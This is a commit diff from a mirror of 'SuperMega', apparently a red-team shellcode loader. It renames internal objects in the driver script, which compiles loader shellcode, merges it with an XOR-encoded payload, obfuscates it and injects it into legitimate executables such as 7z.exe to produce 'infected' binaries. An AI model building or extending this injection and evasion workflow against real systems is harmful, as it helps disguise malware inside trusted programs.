admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: project -> settings and model/

Browse Source
This commit is contained in:
Dobin
2024-02-25 08:47:25 +00:00
parent b1dd3481ed
commit d61f358ae4
18 changed files with 185 additions and 157 deletions
Download Patch File Download Diff File Expand all files Collapse all files
supermega.py
+86 -83
View File
@@ -5,8 +5,9 @@ from typing import Dict
import os
import logging
import time
import pefile
from defs import *
from model.defs import *
from model import *
from helper import *
from config import config
@@ -15,16 +16,18 @@ import phases.compiler
import phases.assembler
import phases.injector
from observer import observer
from project import Project
from pehelper import extract_code_from_exe
from model.project import Project
from model.settings import Settings
log_messages = []
def main():
logger.info("Super Mega")
config.load()
project = Project()
settings = Settings()
parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
@@ -47,57 +50,57 @@ def main():
config.ShowCommandOutput = True
if args.verify:
project.payload_path = "shellcodes/createfile.bin"
project.verify = True
settings.payload_path = "shellcodes/createfile.bin"
settings.verify = True
project.try_start_final_infected_exe = False
project.try_start_final_shellcode = False
settings.try_start_final_infected_exe = False
settings.try_start_final_shellcode = False
if args.verify == "peb":
project.inject = True
project.inject_mode = 2
project.inject_exe_in = "exes/7z.exe"
project.inject_exe_out = "out/7z-verify.exe"
settings.inject = True
settings.inject_mode = 2
settings.inject_exe_in = "exes/7z.exe"
settings.inject_exe_out = "out/7z-verify.exe"
elif args.verify == "iat":
project.inject = True
project.inject_mode = 1 # 2
project.inject_exe_in = "exes/procexp64.exe"
project.inject_exe_out = "out/procexp64-verify.exe"
settings.inject = True
settings.inject_mode = 1 # 2
settings.inject_exe_in = "exes/procexp64.exe"
settings.inject_exe_out = "out/procexp64-verify.exe"
elif args.verify == "rwx":
project.inject = True
project.inject_mode = 1 # ,2 is broken atm
project.inject_exe_in = "exes/wifiinfoview.exe"
project.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
settings.inject = True
settings.inject_mode = 1 # ,2 is broken atm
settings.inject_exe_in = "exes/wifiinfoview.exe"
settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
else:
logger.info("Unknown verify option {}, use std/iat".format(args.verify))
return
else:
project.try_start_final_infected_exe = args.start_injected
project.try_start_final_shellcode = args.start_final_shellcode
project.try_start_loader_shellcode = args.start_loader_shellcode
settings.try_start_final_infected_exe = args.start_injected
settings.try_start_final_shellcode = args.start_final_shellcode
settings.try_start_loader_shellcode = args.start_loader_shellcode
project.cleanup_files_on_start = not args.no_clean_at_start
project.cleanup_files_on_exit =not args.no_clean_at_exit
settings.cleanup_files_on_start = not args.no_clean_at_start
settings.cleanup_files_on_exit =not args.no_clean_at_exit
if args.short_call_patching:
project.short_call_patching = True
settings.short_call_patching = True
if args.alloc:
if args.alloc == "rwx_1":
project.alloc_style = AllocStyle.RWX
settings.alloc_style = AllocStyle.RWX
if args.decoder:
if args.decoder == "plain_1":
project.decoder_style = DecoderStyle.PLAIN_1
settings.decoder_style = DecoderStyle.PLAIN_1
elif args.decoder == "xor_1":
project.decoder_style = DecoderStyle.XOR_1
settings.decoder_style = DecoderStyle.XOR_1
if args.exec:
if args.exec == "direct_1":
project.exec_style = ExecStyle.CALL
settings.exec_style = ExecStyle.CALL
if args.rbrunmode:
if args.rbrunmode == "1" or args.rbrunmode == "2":
project.inject_mode = int(args.rbrunmode)
settings.inject_mode = int(args.rbrunmode)
else:
logging.error("Invalid mode, use one of:")
for i in ["1", "2"]:
@@ -113,16 +116,16 @@ def main():
if not os.path.isfile(args.shellcode):
logger.info("Could not find: {}".format(args.shellcode))
return
project.payload_path = args.shellcode
settings.payload_path = args.shellcode
if args.inject:
if not os.path.isfile(args.inject):
logger.info("Could not find: {}".format(args.inject))
return
project.inject = True
project.inject_exe_in = args.inject
project.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
settings.inject = True
settings.inject_exe_in = args.inject
settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
start(project)
start(settings)
def get_physical_address(pe, virtual_address):
# Iterate through the section headers to find which section contains the VA
@@ -137,88 +140,88 @@ def get_physical_address(pe, virtual_address):
#return physical_address
return None
def start(project: Project):
def start(settings: Settings):
# Delete: all old files
if project.cleanup_files_on_start:
if settings.cleanup_files_on_start:
clean_files()
delete_all_files_in_directory("logs/")
# Load our input
project.load_payload()
project.load_injectable()
project = Project(settings)
project.init()
# Copy: IAT_REUSE loader C files into working directory: build/
phases.templater.create_c_from_template(
source_style = SourceStyle.iat_reuse,
alloc_style = project.alloc_style,
exec_style = project.exec_style,
decoder_style= project.decoder_style,
payload_len = len(project.payload_data),
alloc_style = settings.alloc_style,
exec_style = settings.exec_style,
decoder_style= settings.decoder_style,
payload_len = project.payload.len,
)
# Compile: IAT_REUSE loader C -> ASM
if project.generate_asm_from_c:
if settings.generate_asm_from_c:
phases.compiler.compile(
c_in = main_c_file,
asm_out = main_asm_file,
payload_len = len(project.payload_data),
short_call_patching = project.short_call_patching)
payload_len = project.payload.len,
short_call_patching = project.settings.short_call_patching)
# Decide if we can use IAT_REUSE (all function calls available as import)
required_functions = phases.compiler.get_function_stubs(main_asm_file)
if project.exe_info.has_all_functions(required_functions):
project.source_style = SourceStyle.iat_reuse
if project.exe_host.has_all_functions(required_functions):
settings.source_style = SourceStyle.iat_reuse
logger.warning("--[ SourceStyle: Using IAT_REUSE".format())
# all good, patch ASM
phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_info)
phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_host)
observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
else:
# Not good, Fall back to PEB_WALK
project.source_style = SourceStyle.peb_walk
settings.source_style = SourceStyle.peb_walk
logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format())
observer.clean_files()
clean_files()
# Copy: PEB_WALK loader C files into working directory: build/
phases.templater.create_c_from_template(
source_style = SourceStyle.peb_walk,
alloc_style = project.alloc_style,
exec_style = project.exec_style,
decoder_style= project.decoder_style,
payload_len = len(project.payload_data),
alloc_style = settings.alloc_style,
exec_style = settings.exec_style,
decoder_style= settings.decoder_style,
payload_len = project.payload.len,
)
# Compile: PEB_WALK C -> ASM
if project.generate_asm_from_c:
if settings.generate_asm_from_c:
phases.compiler.compile(
c_in = main_c_file,
asm_out = main_asm_file,
payload_len = len(project.payload_data))
payload_len = project.payload.len)
observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
# Assemble: ASM -> Shellcode
if project.generate_shc_from_asm:
if settings.generate_shc_from_asm:
phases.assembler.asm_to_shellcode(
asm_in = main_asm_file,
build_exe = main_exe_file,
shellcode_out = main_shc_file)
# Try: Starting the loader-shellcode (rarely useful)
if project.try_start_loader_shellcode:
if settings.try_start_loader_shellcode:
try_start_shellcode(main_shc_file)
# Merge: shellcode/loader with payload
if project.dataref_style == DataRefStyle.APPEND:
if settings.dataref_style == DataRefStyle.APPEND:
phases.assembler.merge_loader_payload(
shellcode_in = main_shc_file,
shellcode_out = main_shc_file,
payload_data = project.payload_data,
decoder_style = project.decoder_style)
payload_data = project.payload.payload_data,
decoder_style = settings.decoder_style)
if project.verify and project.source_style == SourceStyle.peb_walk:
if settings.verify and settings.source_style == SourceStyle.peb_walk:
logger.info("--[ Verify final shellcode")
if not verify_shellcode(main_shc_file):
logger.info("Could not verify, still continuing")
#return
if project.try_start_final_shellcode:
if settings.try_start_final_shellcode:
logger.info("--[ Test Append shellcode")
try_start_shellcode(main_shc_file)
@@ -226,9 +229,9 @@ def start(project: Project):
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# RWX Injection
if project.exe_info.rwx_section != None:
if project.exe_host.rwx_section != None:
logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
project.exe_info.rwx_section.Name.decode().rstrip('\x00')
project.exe_host.rwx_section.Name.decode().rstrip('\x00')
))
obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn")
observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn"))
@@ -236,33 +239,33 @@ def start(project: Project):
# inject merged loader into an exe
exit_code = 0
if project.inject:
if settings.inject:
l = len(file_readall_binary(main_shc_file))
if l + 128 > project.exe_info.code_size:
if l + 128 > project.exe_host.code_size:
logger.error("Error: Shellcode {}+128 too small for target code section {}".format(
l, project.exe_info.code_size
l, project.exe_host.code_size
))
return
phases.injector.inject_exe(
shellcode_in = main_shc_file,
exe_in = project.inject_exe_in,
exe_out = project.inject_exe_out,
inject_mode = project.inject_mode,
exe_in = settings.inject_exe_in,
exe_out = settings.inject_exe_out,
inject_mode = settings.inject_mode,
)
if project.source_style == SourceStyle.iat_reuse:
if settings.source_style == SourceStyle.iat_reuse:
phases.injector.injected_fix_iat(
project.inject_exe_out, project.exe_info)
settings.inject_exe_out, project.exe_host)
# TODO IF?
phases.injector.injected_fix_data(
project.inject_exe_out,
settings.inject_exe_out,
config.data_fixups,
config.data_fixup_entries,
project.exe_info)
project.exe_host)
code = extract_code_from_exe(project.inject_exe_out)
pe = pefile.PE(project.inject_exe_out)
code = extract_code_from_exe(settings.inject_exe_out)
pe = pefile.PE(settings.inject_exe_out)
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_raw = get_physical_address(pe, ep)
pe.close()
@@ -273,18 +276,18 @@ def start(project: Project):
code[ep_raw:ep_raw+300])
if project.verify:
if settings.verify:
logger.info("--[ Verify infected exe")
exit_code = phases.injector.verify_injected_exe(project.inject_exe_out)
exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
elif project.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(project.inject_exe_out))
elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
run_process_checkret([
project.inject_exe_out,
settings.inject_exe_out,
], check=False)
# Cleanup files
if project.cleanup_files_on_exit:
if settings.cleanup_files_on_exit:
clean_files()
# write log to file